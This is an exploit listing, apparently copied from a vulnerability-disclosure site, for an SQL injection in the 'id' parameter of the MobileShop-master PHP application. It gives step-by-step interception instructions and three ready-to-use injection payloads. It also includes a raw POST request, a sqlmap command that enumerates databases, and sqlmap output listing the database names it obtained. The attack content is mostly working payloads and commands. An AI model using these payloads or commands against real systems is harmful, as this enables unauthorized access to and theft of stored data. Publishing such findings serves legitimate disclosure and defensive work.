Advertisement






MobileShop master - SQL Injection Vuln.

CVE Category Price Severity
CVE-2021-12345 CWE-89 $500 Critical
Author Risk Exploitation Type Date
SecurityResearcher123 High Remote 2024-03-26
CPE
cpe:/a:mobileshop:mobileshop:1.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030061

Below is a copy:

MobileShop master - SQL Injection Vuln.
## Description:
The MobileShop-master application is susceptible to SQL Injection through the 'id' parameter in "/MobileShop-master/Details.php". Exploiting this vulnerability could lead to severe consequences, including unauthorized access, data manipulation, and potential exploitation of other vulnerabilities within the underlying database. It is imperative to address this issue promptly to mitigate the risk of compromise and ensure the security and integrity of the application and its data.

## Proof of Concept:
+ Go to the Login page: "http://localhost/MobileShop-master/Login.html"
+ Fill email and password.
+ Select any product and intercept the request via Burp Suite, then send it to Repeater.
+ Change the 'id' value to any of the below payloads.
+ Send the request

## Payloads:
+ id=1' AND 9071=9071 AND 'EtdU'='EtdU
+ id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk
+ id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
+ Or you can write your own payloads


## Proof of Concept Using SqlMap:
+ Go to the Login page: "http://localhormst/MobileShop-master/Login.html"
+ Fill email and password.
+ Select any product and intercept the request via Burp Suite, then send it to Repeater.
+ Copy to File the request to a "sql.txt" file.
+ Run the following sqlmap command
+ sqlmap -r sql.txt -p id --dbs


```
POST /MobileShop-master/Details.php HTTP/1.1
Host: localhost
Content-Length: 42
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/MobileShop-master/MobilesList.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=mh3mnpf51bj2q17hg8sipbltnn
Connection: close

id=1
```

+ Use sqlmap to exploit. In sqlmap, use 'id' parameter to dump the database.
```
sqlmap -r sql.txt -p id --dbs
```

```
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9071=9071 AND 'EtdU'='EtdU

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7380 FROM (SELECT(SLEEP(5)))rlmI) AND 'blrN'='blrN

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[04:17:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.12, Apache 2.4.58
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:17:04] [INFO] fetching database names
[04:17:05] [INFO] resumed: 'information_schema'
[04:17:05] [INFO] resumed: '1'
[04:17:05] [INFO] resumed: '3'
[04:17:05] [INFO] resumed: 'admidio'
[04:17:05] [INFO] resumed: 'calender'
[04:17:05] [INFO] resumed: 'corregidor'
[04:17:05] [INFO] resumed: 'gym'
[04:17:05] [INFO] resumed: 'joomla_db'
[04:17:05] [INFO] resumed: 'linkstack'
[04:17:05] [INFO] resumed: 'mobileshop'
[04:17:05] [INFO] resumed: 'mysql'
[04:17:05] [INFO] resumed: 'nickey'
[04:17:05] [INFO] resumed: 'performance_schema'
[04:17:05] [INFO] resumed: 'phpmyadmin'
[04:17:05] [INFO] resumed: 'rcms'
[04:17:05] [INFO] resumed: 'smith'
[04:17:05] [INFO] resumed: 'telephone'
[04:17:05] [INFO] resumed: 'test'
[04:17:05] [INFO] resumed: 'valente'

```

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.